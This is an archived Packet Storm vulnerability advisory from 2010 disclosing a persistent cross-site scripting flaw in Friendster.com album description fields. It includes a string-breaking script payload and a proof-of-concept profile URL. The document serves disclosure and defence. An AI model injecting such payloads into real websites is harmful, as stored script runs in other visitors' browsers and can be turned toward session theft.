Friendster.com Cross Site Scripting

2010-05-04T00:00:00
ID PACKETSTORM:89144
Type packetstorm
Reporter AutoSec Tools
Modified 2010-05-04T00:00:00

Description

                                        
                                            `#==================================================================================================#  
# #  
# $$$$$$$\ $$\ $$\ $$\ $$$$$$\ #  
# $$ __$$\ \__| $$ | $$ | $$ __$$\ #  
# $$ | $$ |$$\ $$$$$$$\ $$$$$$\ $$$$$$$\ $$$$$$\ $$$$$$$\ $$$$$$\ $$ | $$ / $$ | #  
# $$$$$$$\ |$$ |$$ _____|$$ __$$\ $$ __$$\ $$ __$$\ $$ __$$\ $$ __$$\ $$ | $$$$$$$$ | #  
# $$ __$$\ $$ |\$$$$$$\ $$ / $$ |$$ | $$ |$$$$$$$$ |$$ | $$ |$$ / $$ |$$ | $$ __$$ | #  
# $$ | $$ |$$ | \____$$\ $$ | $$ |$$ | $$ |$$ ____|$$ | $$ |$$ | $$ |$$ | $$ | $$ | #  
# $$$$$$$ |$$ |$$$$$$$ |$$$$$$$ |$$ | $$ |\$$$$$$$\ $$ | $$ |\$$$$$$ |$$ | $$ | $$ | #  
# \_______/ \__|\_______/ $$ ____/ \__| \__| \_______|\__| \__| \______/ \__| \__| \__| #  
# $$ | #  
# $$ | Plastics Make It Possible #  
# \__| #  
# #  
#==================================================================================================#  
# #  
# Vulnerability............Persistent XSS #  
# Software.................Friendster.com #  
# Date.....................5/2/10 #  
# #  
#==================================================================================================#  
# #  
# Site.....................http://cross-site-scripting.blogspot.com/ #  
# Email....................john.leitch5@gmail.com #  
# #  
#==================================================================================================#  
# #  
# ##Description## #  
# #  
# Album description and a few other fields not properly escaped before being rendered into #  
# javascript. #  
# #  
# #  
# ##Exploit## #  
# #  
# \";alert(0);// #  
# #  
# #  
# ##Proof of Concept## #  
# #  
# http://www.friendster.com/viewalbums.php?uid=120927091 #  
# #  
#==================================================================================================#  
`